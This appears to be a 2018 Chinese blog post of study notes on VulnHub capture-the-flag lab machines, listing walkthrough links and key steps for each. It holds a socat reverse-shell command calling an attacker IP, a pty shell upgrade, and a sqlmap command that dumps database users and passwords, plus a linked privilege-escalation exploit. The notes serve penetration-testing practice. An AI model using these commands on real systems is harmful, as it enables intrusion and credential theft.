靶场测试系列(已办清单)

在线靶场

https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps

总清单

http://www.hackingarticles.in/capture-flag-challenges/

Hackademic: RTB1

地址

https://www.vulnhub.com/entry/hackademic-rtb1,17/

wp

http://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/

重点

sql 注入获取 wordpress 管理员密码,然后后台上传拿 shell.

使用

python -c 'import pty; pty.spawn("/bin/bash")'

shell 转成 tty shell 用于提权

然后用

https://www.exploit-db.com/download/40839

提权

转 交互式 shell 的另一种方式

攻击者的机器,监听

socat file:`tty`,raw,echo=0 tcp-listen:4444

被攻击的机器端执行,反弹 shell

./socat_i386_static exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.245.128:4444

参考

https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://github.com/static-linux/static-binaries-i386/blob/master/socat-2.0.0-b8.tar.gz
https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64

De-ICE

地址

https://www.vulnhub.com/entry/de-ice-s1120,10/

wp

http://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/

重点

sql 注入获取 数据库用户名和密码

sqlmap -u http://192.168.1.120/products.php?id=1 -D mysql --users --passwords --batch

用获取到的用户名和密码尝试登陆 ssh

然后用 linux-exploit-suggesterexp ,最后用

https://www.exploit-db.com/download/40839

拿到 root

一定按流程走,先搜集漏洞信息,后面综合考虑利用。

pWnOS-2.0

地址

https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

wp

http://www.hackingarticles.in/hack-the-pwnos-2-0-boot-2-root-challenge/

重点

  • 利用 开源系统的漏洞,生成用户名
  • 登陆后文件上传漏洞 getshell
  • exp 提权

PwnLab: init

地址

https://www.vulnhub.com/entry/pwnlab-init,158/

wp

http://www.hackingarticles.in/penetration-testing-pwnlab-ctf-challenge/

重点

  • 文件包含( 限制了文件结尾 ) + php 流 获取 php 文件内容
  • 登陆后上传图片,然后利用包含获取 shell
  • 使用 exp 提权
posted @ 2018-08-07 19:40  hac425  阅读(1297)  评论(0编辑  收藏  举报